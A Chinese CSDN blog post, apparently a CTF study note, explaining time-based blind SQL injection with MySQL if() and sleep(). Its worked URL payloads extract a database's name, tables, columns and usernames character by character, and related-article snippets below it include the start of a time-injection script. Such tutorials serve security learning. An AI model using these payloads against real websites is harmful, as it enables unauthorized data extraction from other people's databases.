CTF时间盲注(延时注入)

最新推荐文章于 2024-05-15 02:25:52 发布
最新推荐文章于 2024-05-15 02:25:52 发布
阅读量352 收藏 5
点赞数 1
文章标签: 数据库 sql 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68357559/article/details/137127366
版权

时间盲注又称延迟注入,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。

因为延时注入页面不会有回显,又由于页面无法返回正确或错误的值,所以只能通过if加sleep函数解决问题,再根据页面反应时间判断具体情况

if(判断语句,x,y)如果判断语句正确则输出X,否则输出Y
sleep(X)函数,延迟X秒后回显
if(1=1,1,sleep(1))即输出一
if(1=2,1,sleep(1))即延迟一秒后回显

 

盲注需要试错

?id=1′ and if(length(database())>(一个数字),sleep(2),0) –+//判断库名长度

 

?id=1′ and if(ascii(substr(database(),第一个字母,1))=115,sleep(2),0) –+
//此为判断第一个字母的ascii码是否为115

?id=1′ and if(ascii(substr(database(),第二个字母,1))=101,sleep(2),0) –+
此为判断第二个字母的ascii码是否为101

依次类推出所有库名

判断表名

?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit x,y),z,d))=e,sleep(1),0)–+

其中x代表第x+1个表,y表示第x+1往后y个单位的表,z表示第几个字母,d表示z往后d个单位的字母

通过不断改变z和E的值来判断出表名

判断列名

?id=1’ and If(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ and table_schema=database() limit x,y),z,d))=105,sleep(2),1)–+

x:第x+1个列,y:x+1个列往后y个单位,z:x+1列的第一个字母,d:第一个字母往后的第z个单位

爆数据

?id=1′ and If(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(2),1)–+

 

 

问巻
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2024最新版聚合支付彩虹易支付PHP源码(1)
2301_77110907的博客
04-26 645
通过这个平台,您可以方便地接入多种支付方式,包括支付宝当面付、QQ钱包、财付通、微信扫码支付和个体商户聚合收款码等。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?15、讲述一下LVS三种模式的工作过程?
CTFSQL.py
11-25
CTF解题中有时会用到,这是一段SQL代码,运行于python37环境,多个字段信息提取的句子已释保存。
CTF-时间
黎先生的博客
10-20 675
基于时间 sleep 1.配合if条件触发 IF() select if(1,2,3) substr(str, position, len) substring(str, position, len) == substring(str FROM position FOR len) substring_index(被截取的字段, 关键字, 关键字出现的次数) select * from us...
CTF从入门到提升(三)基于时间及部分函数_时间函数有哪些
最新发布
m0_60707263的博客
05-15 909
id=1之后,它后面的逻辑就不管会不会运行SLEEP,但是针对表中的234,id≠1的,它就会去判断后面这个逻辑,这个时候它就会都去做一个延时,运行一个SLEEP(3)。在添加了SLEEP函数之后,它的运行结果要是变慢了,而且它的变慢的时间和我们填的设置的时间是接近的,或者说是长于这个时间的。2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?7、Tomcat和Resin有什么区别,工作中你怎么选择?
CTF-时间专题
PolarPeak的博客
04-25 2518
文章目录参考时间Heavy QueryGet_lock()Rlikesleep2019hgame-week3-sqli2 `sleep`benchmark题pwnhub全宇宙最最简单的PHP博客系统 `Get_lock() Heavy Query` 参考 时间 Heavy Query 个人认为这个方法是本题的最优解 原理就如方法的名字:大负荷查询 即用到一些消耗资源的方式让数据库的查询时间尽量变长 而消耗数据库资源的最有效的方式就是让两个大表做笛卡尔积,这样就可以让数据库的查询慢下来 而最后找到系统
CTFHUB-SQL注入-时间
u014794539的博客
07-10 424
考点 SQL时间 时间攻击 利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。 分析过程 1 and if(length(database())=5,sleep(3),1) 1 and if(length(database())=4,sleep(3),1) 1 and
[CTF]SQL基于时间(BUGKUCTF
V1040375575的博客
11-26 1218
这篇只是为了让我自己做个记录 在进行一个BUGKU的ctf:http://123.206.87.240:8002/web15/ 题目给出了源码: error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_...
ctfshow web214 时间标准脚本
10-21
ctfshow web214 时间标准脚本
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF 加密 解密 SQL注入 BASE64
03-19
在网络安全领域,CTF(Capture The Flag)是一种常见的竞赛形式,它涵盖了多种技术挑战,包括但不限于加密、解密、SQL注入以及编码技术如BASE64。在这个场景中,我们将深入探讨这些关键知识点。 首先,加密与解密是...
CTFHub 技能树之时间
qq_47271638的博客
05-27 992
CTFHub 技能树之时间 首先需要知道时间和布尔一样都是需要大量的时间来整理组合自己所注入的集合 所以本篇主要介绍sqlmap和手工注入联合起来注入 具体步骤: 1.打开环境 判断注入类型 要么此处采用手工判断要么采用sqlmap判断 我们这里采用sqlmap判断 sqlmap初步判断类型为时间 现在就可以自己构造手工注入语句: http://challenge-4e00395e736a4b55.sandbox.ctfhub.com:10080/?id=1 and if(mid(dat
ctf】sql注入——基于时间
wlllllianqing的博客
09-18 793
基于时间 原理:利用sleep()或benchmark()等函数让mysql执行时间变长,并结合判断条件if(expr1,expr2,expr3),然后通过页面的响应时间长短来判断语句返回的值是TRUE还是False,从而猜解一些未知的字段。 函数sleep(duration): 睡眠(暂停)时间为duration参数给定的秒数,然后返回0。若sleep()被中断,它会返回1。 select * from table where id=1 and sleep(3); select * from tab
攻防_漏洞_SQL注入_时间
redglare的博客
12-01 1818
import requests import string url = 'http://127.0.0.1/sql/p8/index.php?id=2' #url flag = '' for i in range(1,30): l,r = 32, 127 while l < r: m = (l+r) // 2 payload = '-if(ascii(substr((select group_concat(i_am_f1ag_column) from
NewStarCTF2023week4-midsql(利用二分查找实现时间攻击)
Welcome To Myon'Blog !
10-29 1173
代码通过不断猜测每个字符的 ASCII 值来构建数据库名,一旦一个字符的 ASCII 值被确定,就继续下一个字符。但是这里尝试了很多都只返回一个页面,没有出现报错页面,因此采用时间,利用sleep函数,制造时间延迟,由回显时间来判断是否报错。意:这里查询的内容还是需要加上 group_concat(),因为之前我做的一些联合查询有时候不需要加,但是在这里我试了,不行。(我最开始以为是and被过滤,并没有,如果是and或者or被过滤我们也可以使用 && 和 || 替代)
CTF系列之Web——SQL注入
洛柒尘的博客
06-09 8322
前言 在刚学习sql注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的sql注入知识点。 学习web系列推荐先学习Mysql、H
一天一道ctf 第35天(
scrawman的博客
07-17 218
[极客大挑战 2019]FinalSQL 点进来看到这样的页面,万能密码试了下没用,不过作者这里也提示过了。注入点是点击神秘代码1以后的这个界面,尝试?id=1^(1==1)^1,页面正常回显,说明可以注入。 这里参考了大佬写的脚本,毕竟实在太花时间了。网上还有其他更简练的脚本,但是我跑的时候都不是很稳定,爆出来的字段名有时候会有错误。这个用了三个payload,虽然看起来麻烦了点,但是胜在稳定。 import requests import re import string s = requ
ctfshow-web延时注入平替-web217~web220,2024年最新2024年网络安全开发实战
2401_84164527的博客
04-09 999
天花板技术停滞不前!**
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1.了解Web基础知识,例如HTTP协议、HTML、CSS、JavaScript等。 2.学习Web漏洞,例如SQL注入、XSS、CSRF等。 3.掌握一些常用的Web工具,例如Burp Suite、sqlmap、dirbuster等。 4.多练习,多尝试,多思考。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值